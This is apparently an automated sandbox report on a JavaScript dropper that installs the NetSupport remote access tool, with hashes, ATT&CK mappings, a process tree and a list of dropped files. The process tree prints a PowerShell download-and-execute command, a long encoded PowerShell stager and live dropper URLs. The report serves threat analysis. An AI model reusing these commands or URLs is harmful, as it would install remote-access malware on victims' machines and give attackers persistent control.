netsupport | 4198a65d984c721863bef300062563aa75b38773aab949167762d31316c9ed4d

Analysis

max time kernel
94s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
23/01/2024, 13:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

in_8518513851851.js
Size

26KB
MD5

1691c975ce328fa6625a41b0fe8cbefe
SHA1

8309db41c61aee1f24e6f1318aa92781752d1428
SHA256

4198a65d984c721863bef300062563aa75b38773aab949167762d31316c9ed4d
SHA512

51eae76596d4f548564979e74596f99dfd3193628719d46e7598eba6092985be5c3c9b5ac15e23282fbd20fcff6e1b9b644d2386f8099b12d33b7d3493700962
SSDEEP

768:Vg5LTW9Qt7DAhBLREvMhVfmUjGU8OyYC88aMtzDcUa9Mgj+l+or5jo53EuA9gZAN:KFOyYK/gj/MwcgMF

Score

10^/10

netsupport persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://hsdiagnostico.com/readme.php

Extracted

Language

ps1

Source

URLs

exe.dropper

https://core-click.net/TVFrontend/NSM.zip

exe.dropper

https://core-click.net/TVFrontend/remcmdstub.zip

exe.dropper

https://core-click.net/TVFrontend/DLAA1view.zip

exe.dropper

https://core-click.net/TVFrontend/mock/

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	2580	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
3216	client32.exe

Loads dropped DLL 6 IoCs

pid	Process
3216	client32.exe
3216	client32.exe
3216	client32.exe
3216	client32.exe
3216	client32.exe
3216	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aragdrts = "C:\\Users\\Admin\\AppData\\Roaming\\aragdrts\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2580	powershell.exe
2580	powershell.exe
2172	powershell.exe
2172	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeSecurityPrivilege	3216	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3216	client32.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 1332 wrote to memory of 2580	1332	wscript.exe	93
PID 1332 wrote to memory of 2580	1332	wscript.exe	93
PID 2580 wrote to memory of 2172	2580	powershell.exe	95
PID 2580 wrote to memory of 2172	2580	powershell.exe	95
PID 2172 wrote to memory of 3216	2172	powershell.exe	99
PID 2172 wrote to memory of 3216	2172	powershell.exe	99
PID 2172 wrote to memory of 3216	2172	powershell.exe	99

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\in_8518513851851.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://hsdiagnostico.com/readme.php')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noPROFi -ExECutionpoL ByPass -w hidd -E JAA5AE4AUQB4AFQAPQAnAEgASQBaAEwATQBJAC4AegBpAHAAJwA7ACAAYwBoAEQASQByACAAJABlAE4AVgA6AGEAcABwAEQAYQB0AEEAOwAgACQAcQBnAEoASAA3AD0AZwBFAFQALQBjAG8AbQBNAEEATgBEACAARQBYAHAAYQBOAGQALQBhAFIAYwBIAEkAdgBFACAALQBlAFIAUgBPAFIAYQBjAFQAaQBPAG4AIABzAGkATABFAE4AVABMAHkAYwBvAG4AdABJAE4AVQBFADsAIAAkAEsANAB1AEEATQA9ACcAWABpADgANQAxADcAOQAuAHoAaQBwACcAOwAgAFsAbgBFAHQALgBzAGUAUgB2AEkAQwBlAHAATwBJAE4AdABtAEEAbgBhAEcARQBSAF0AOgA6AHMARQBDAFUAUgBJAFQAeQBQAFIAbwBUAE8AYwBvAGwAIAA9ACAAWwBuAEUAdAAuAHMARQBjAFUAcgBpAFQAeQBQAHIAbwBUAE8AYwBPAGwAdABZAHAARQBdADoAOgB0AEwAUwAxADIAOwAgACQASABuAGcAZgBEAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBvAHIAZQAtAGMAbABpAGMAawAuAG4AZQB0AC8AVABWAEYAcgBvAG4AdABlAG4AZAAvAE4AUwBNAC4AegBpAHAAJwA7ACAAJABKAEMANQBSAHoANQBOAFMAPQBnAEMATQAgAFMAVABBAFIAdAAtAGIASQBUAFMAdABSAGEAbgBTAGYARQByACAALQBFAHIAcgBvAFIAQQBDAFQASQBPAG4AIABzAGkATABlAE4AdABMAHkAQwBvAG4AdABJAE4AVQBFADsAIAAkAEgAcABvAHkATQA9ACcAYQByAGEAZwBkAHIAdABzACcAOwAgACQAUQBkAEkANABwAEEAOABZAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBvAHIAZQAtAGMAbABpAGMAawAuAG4AZQB0AC8AVABWAEYAcgBvAG4AdABlAG4AZAAvAHIAZQBtAGMAbQBkAHMAdAB1AGIALgB6AGkAcAAnADsAIAAkAHkAMQBsAEkANwBQAGkATgA9ACcAaAB0AHQAcABzADoALwAvAGMAbwByAGUALQBjAGwAaQBjAGsALgBuAGUAdAAvAFQAVgBGAHIAbwBuAHQAZQBuAGQALwBEAEwAQQBBADEAdgBpAGUAdwAuAHoAaQBwACcAOwAgACQASgBhAGcAaABPAD0AJwBiAFQAUwBmAFEAVgBoAC4AegBpAHAAJwA7ACAAJABmAEoAQQBSAGgAVABmAFYAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAFYAOgBhAFAAcABEAGEAdABhACwAIAAkAEsANAB1AEEATQA7ACAAJABHAFEAVQBTADQARABoAHEAPQAkAEUAbgB2ADoAYQBQAHAARABBAHQAQQArACcAXAAnACsAJABKAGEAZwBoAE8AOwAgACQAcgA4AGsAegBRADMAZQBqAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAEUAbgBWADoAQQBwAHAAZABhAFQAYQAsACAAJAA5AE4AUQB4AFQAOwAgACQAdQBzAHMASABXAHIAPQAnAEIASQBUAFMAYQBEAE0ASQBOAC4ARQBYAEUAIAAvAFQAcgBBAG4AcwBmAGUAUgAgAGQAZABkAHYAUwAwAFYAagAgAC8AZABvAFcAbgBsAG8AYQBEACAALwBQAHIAaQBPAHIAaQB0AHkAIABuAG8AUgBtAEEATAAnACwAIAAkAEgAbgBnAGYARAAsACAAJABmAEoAQQBSAGgAVABmAFYAIAAtAEoATwBpAG4AIAAnACAAJwA7ACAAJAA1AFUARgB6AEkAPQAiAGIAaQBUAFMAYQBEAE0AaQBOAC4AZQBYAGUAIAAvAHQAcgBhAE4AUwBmAGUAUgAgAHIANAAyAGkAagBKACAALwBEAG8AVwBuAEwAbwBBAEQAIAAvAHAAcgBpAE8AcgBJAFQAWQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJAB5ADEAbABJADcAUABpAE4ALAAgACQAcgA4AGsAegBRADMAZQBqADsAIAAkAE0AeABjAEQAMgBiAFYAPQAiAEIAaQB0AHMAYQBkAE0ASQBuAC4AZQB4AGUAIAAvAFQAcgBBAG4AUwBGAEUAcgAgAFEAWABIAE0ATwBUACAALwBEAE8AVwBOAEwATwBBAGQAIAAvAFAAcgBJAE8AUgBpAHQAeQAgAG4AbwBSAE0AYQBMACAAJABRAGQASQA0AHAAQQA4AFkAIAAkAEcAUQBVAFMANABEAGgAcQAiADsAIAAkAFcAbQBUAE0ARgBDAHAAVwA9AEoATwBJAG4ALQBQAEEAdABoACAALQBwAEEAdABoACAAJABFAE4AdgA6AEEAcABQAEQAQQBUAEEAIAAtAEMAaABJAGwAZABwAGEAVABIACAAJABIAHAAbwB5AE0AOwAgAGkARgAgACgAJABxAGcASgBIADcAKQAgAHsAIABpAEYAIAAoACQASgBDADUAUgB6ADUATgBTACkAIAB7ACAAcwB0AGEAUgBUAC0AYgBpAFQAUwB0AFIAYQBOAFMAZgBlAHIAIAAtAFMATwB1AHIAYwBFACAAJABRAGQASQA0AHAAQQA4AFkAIAAtAGQARQBTAFQASQBuAEEAdABpAE8AbgAgACQARwBRAFUAUwA0AEQAaABxADsAIABzAHQAQQByAHQALQBCAEkAdABTAFQAUgBBAG4AcwBGAEUAcgAgAC0AcwBvAFUAUgBjAGUAIAAkAEgAbgBnAGYARAAgAC0ARABlAHMAVABpAG4AYQB0AEkATwBOACAAJABmAEoAQQBSAGgAVABmAFYAOwAgAHMAdABBAFIAVAAtAEIASQB0AFMAVABSAEEAbgBTAEYAZQBSACAALQBzAE8AVQBSAGMARQAgACQAeQAxAGwASQA3AFAAaQBOACAALQBEAGUAUwB0AEkATgBBAHQASQBPAG4AIAAkAHIAOABrAHoAUQAzAGUAagA7ACAAfQAgAGUAbABTAGUAIAB7AEkAbgBWAE8ASwBFAC0ARQB4AFAAcgBFAHMAcwBJAG8ATgAgAC0AQwBvAE0ATQBBAG4ARAAgACQAdQBzAHMASABXAHIAOwAgAGkATgB2AG8ASwBFAC0AZQBYAHAAUgBFAHMAUwBJAG8AbgAgAC0AYwBPAG0AbQBhAG4ARAAgACQATQB4AGMARAAyAGIAVgA7ACAAJgAgACQANQBVAEYAegBJADsAIAB9ACAAZQBYAFAAYQBOAEQALQBBAHIAYwBoAEkAdgBFACAALQBQAEEAdABIACAAJABmAEoAQQBSAGgAVABmAFYAIAAtAGQAZQBzAHQASQBOAEEAVABpAG8ATgBwAGEAVABoACAAJABXAG0AVABNAEYAQwBwAFcAOwAgAEUAeABwAEEATgBkAC0AYQByAEMAaABpAHYARQAgAC0AcABhAFQAaAAgACQAcgA4AGsAegBRADMAZQBqACAALQBkAGUAUwB0AGkAbgBhAHQAaQBPAE4AUABBAHQASAAgACQAVwBtAFQATQBGAEMAcABXADsAIABFAHgAcABBAG4AZAAtAGEAUgBjAEgAaQBWAEUAIAAtAHAAYQBUAEgAIAAkAEcAUQBVAFMANABEAGgAcQAgAC0AZABFAFMAVABJAE4AYQB0AGkAbwBuAHAAYQBUAGgAIAAkAFcAbQBUAE0ARgBDAHAAVwA7ACAAcgBEACAALQBQAGEAdABoACAAJAByADgAawB6AFEAMwBlAGoAOwAgAEUAcgBBAHMAZQAgAC0AcABBAHQAaAAgACQAZgBKAEEAUgBoAFQAZgBWADsAIAByAE0AIAAtAHAAQQBUAEgAIAAkAEcAUQBVAFMANABEAGgAcQA7ACAAfQAgAGUAbABTAGUAIAB7ACAAJABEAGYAYwBWAHUAZQA9ACcAaAB0AHQAcABzADoALwAvAGMAbwByAGUALQBjAGwAaQBjAGsALgBuAGUAdAAvAFQAVgBGAHIAbwBuAHQAZQBuAGQALwBtAG8AYwBrAC8AJwA7ACAAJABvAFcAQwB5AG8APQBAACgAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAbQBfAHYAcAByAG8ALgBpAG4AaQAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAE4AUwBNAC4ATABJAEMAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBQAEMASQBDAEgARQBLAC4ARABMAEwAJwApADsAIABuAEkAIAAtAFAAQQB0AEgAIAAkAEUAbgBWADoAYQBQAFAAZABhAHQAQQAgAC0ATgBhAE0ARQAgACQASABwAG8AeQBNACAALQBJAFQARQBNAHQAWQBwAGUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgAGkARgAgACgAJABKAEMANQBSAHoANQBOAFMAKQAgAHsAIAAkAG8AVwBDAHkAbwAgAHwAIABmAG8AcgBlAGEAYwBoAC0ATwBiAEoARQBDAHQAIAB7ACAAJAB5AEkARQBsAEgASABOAD0AJABEAGYAYwBWAHUAZQArACQAXwA7ACAAJAA2AEUAeABlAFkAcgBwAD0AJABXAG0AVABNAEYAQwBwAFcAKwAnAFwAJwArACQAXwA7ACAAUwBUAEEAUgB0AC0AYgBpAHQAcwB0AFIAYQBuAFMARgBFAHIAIAAtAHMAbwBVAHIAYwBFACAAJAB5AEkARQBsAEgASABOACAALQBEAGUAcwB0AGkATgBBAFQASQBvAE4AIAAkADYARQB4AGUAWQByAHAAOwAgAH0AOwB9ACAAZQBMAHMARQAgAHsAIAAkAG8AVwBDAHkAbwAgAHwAIABGAE8AUgBlAEEAYwBoACAAewAgACQAeQBJAEUAbABIAEgATgA9ACQARABmAGMAVgB1AGUAKwAkAF8AOwAgACQANgBFAHgAZQBZAHIAcAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABXAG0AVABNAEYAQwBwAFcALAAgACQAXwA7ACAAJABBAFcAagB5AEgAZwA9ACIAYgBJAHQAcwBBAGQATQBpAE4ALgBFAHgARQAgAC8AdAByAEEAbgBTAEYARQBSACAAbAB5AHEANABYAFkANQBpACAALwBkAG8AVwBuAEwATwBhAEQAIAAvAHAAUgBpAG8AcgBpAHQAWQAgAE4AbwBSAG0AQQBsACAAJAB5AEkARQBsAEgASABOACAAJAA2AEUAeABlAFkAcgBwACIAOwAgAEkATgBWAE8AawBlAC0AZQBYAHAAUgBlAHMAcwBpAG8ATgAgAC0AQwBPAG0ATQBBAE4AZAAgACQAQQBXAGoAeQBIAGcAOwB9ADsAIAB9ADsAIAB9ADsAIAAkAHYAUQByAHMAUAA9AEcAZQBUAC0ASQB0AEUATQAgACQAVwBtAFQATQBGAEMAcABXACAALQBGAE8AcgBjAGUAOwAgACQAdgBRAHIAcwBQAC4ATgBhAE0ARQA9ACcASABpAGQAZABlAG4AJwA7ACAAYwBEACAAJABXAG0AVABNAEYAQwBwAFcAOwAgACQATAB1AEsAbQAwAEcAagBHAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAFcAbQBUAE0ARgBDAHAAVwA7ACAAcwB0AGEAUgBUAC0AUABSAG8AYwBlAHMAcwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIABuAEUAdwAtAGkAVABFAG0AcAByAG8AcABlAFIAdAB5ACAALQBQAEEAdABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAGEATQBFACAAJABIAHAAbwB5AE0AIAAtAFYAYQBsAFUARQAgACQATAB1AEsAbQAwAEcAagBHACAALQBwAFIATwBwAGUAcgB0AFkAdAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7AA==
    3⤵
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe
      "C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:3216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
dd6085af47993de750fc1bba39e02d75

SHA1
c83d868735b3170ae109cacc1163ba647ab3e5b2

SHA256
847924eed8197b381f6dfe87f2f1ad3d6a4ea542e5afe291e3e5144419ba28b4

SHA512
9d50ba6331a1c5b1ae6b38bdee8e8bf871d63c3245b78b40d6287b9730e862bd731f99e1956ddf28db819592b35b005824b078535de2a0003523ebd8ab62c59d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c61af77a986fba2bccf5b58847a4e8d5

SHA1
dd4817b2513dbf9ffa8981342ea220f6152ac6f6

SHA256
fd6351696ab2cf34585f6ae63344680f0e66d1333789f25d8ef96b5f446eeca2

SHA512
be19fcc6ce7726fe44492f3d397fd2ba51183774cf498a96ca784c0958634b0f4ca785d9b7e118342eff7e42dc2da8ba70453a338b45d2d068e2e7aca874cbc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vvdtwbkb.2db.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\NSM.LIC

Filesize
258B

MD5
9e482d086f86c0ea705aba09847b7491

SHA1
008e4fef872595a4d61a6977f26d8b6e45c7b758

SHA256
bb8591770a069d090a0208e9981e07a92ce01e560e48e4dbf0d7f2261e84dc95

SHA512
0e744e0b1f1c2a92bb54897609921e0e6578f295fe4f47adc570bc99855eb42e38f77b9069a68404473d566b8db4f5840b8da48345c5f9fb709ba82af84606de

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\PCICL32.dll

Filesize
1.9MB

MD5
fcf4ac99917f965b37dd162d2f98c6a4

SHA1
79bbcc785a26fe37561bb77fbf24c2a97ac0c9c7

SHA256
d5186a548cf8b60e64122ae2906d6b5f2e42099acda52bf980a145a281907bd0

SHA512
fc3fc28e77c507ca65b123b4449685e6a2b8bb8d00683b9940352d63efef1d8de40125d2496dd58a64568d461b33e0bbe5ac968be2b0b063887972ab5e02b4ff

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe

Filesize
114KB

MD5
f36a7294ff7aa92571a3fd7c91282dd5

SHA1
849e777458ef42b3138f33f6e50623246eafb7a7

SHA256
42c2d35457abce2fea3897ba5e569f51b74b40302ff15b782e3b20b0aa00b34e

SHA512
285165bdf774e4db062c996dc148dfd6a5263d89a7ae3e1bb193afb9513cd95a40dc8689ab1fd5c56b90fbdd65c6b05cfe2a3cbde4195d5b8bef239eac315145

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\client32.ini

Filesize
634B

MD5
177fa5379c8d7bddd60d227dd33b3a31

SHA1
3e3049b6aad78f81073f0aaaeed5347d1c8d62ba

SHA256
000e3f630049435b9113aaf28e2cfedad58eb7a749a421923527ee4bd8031dd6

SHA512
93efdf2af5d6d544715a1cec52260ba59062346f212bff58cf5f196b28093f8168e6a3c76a2a1fbf874ab3ba68dfc6905c5cf37f2bd96bc51ab492edec6b7abe

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
C:\Users\Admin\AppData\Roaming\aragdrts\pcicl32.dll

Filesize
1.6MB

MD5
8e9e7c43709c36a0c65ead4195e5d218

SHA1
23732a33af971f1012ed5c3dd25a114b4ffa1154

SHA256
36520d8bc266cb2cb2ab15259dfe59c34b03145d5481f194aeb508452595e08d

SHA512
360cbc6c3d7394967a7f64b32a80dbada8ccb48c8cc1d900f55cf10ab7200d3991124d4f911ffea102c30faf9371b00e77274e4d2463bd89c3e68d0b7e3a6a9e

Download Submit
memory/2172-29-0x00000282F0C90000-0x00000282F0C9A000-memory.dmp

Filesize
40KB

Download
memory/2172-23-0x00000282EE660000-0x00000282EE670000-memory.dmp

Filesize
64KB

Download
memory/2172-28-0x00000282F0CA0000-0x00000282F0CB2000-memory.dmp

Filesize
72KB

Download
memory/2172-27-0x00000282EE660000-0x00000282EE670000-memory.dmp

Filesize
64KB

Download
memory/2172-26-0x00000282F0C60000-0x00000282F0C74000-memory.dmp

Filesize
80KB

Download
memory/2172-25-0x00000282F0BF0000-0x00000282F0C16000-memory.dmp

Filesize
152KB

Download
memory/2172-83-0x00007FFBC96C0000-0x00007FFBCA181000-memory.dmp

Filesize
10.8MB

Download
memory/2172-32-0x00000282EE660000-0x00000282EE670000-memory.dmp

Filesize
64KB

Download
memory/2172-24-0x00000282EE660000-0x00000282EE670000-memory.dmp

Filesize
64KB

Download
memory/2172-22-0x00007FFBC96C0000-0x00007FFBCA181000-memory.dmp

Filesize
10.8MB

Download
memory/2580-88-0x00007FFBC96C0000-0x00007FFBCA181000-memory.dmp

Filesize
10.8MB

Download
memory/2580-12-0x00000192B6120000-0x00000192B6130000-memory.dmp

Filesize
64KB

Download
memory/2580-11-0x00000192B6120000-0x00000192B6130000-memory.dmp

Filesize
64KB

Download
memory/2580-10-0x00007FFBC96C0000-0x00007FFBCA181000-memory.dmp

Filesize
10.8MB

Download
memory/2580-9-0x00000192B7BB0000-0x00000192B7BD2000-memory.dmp

Filesize
136KB

Download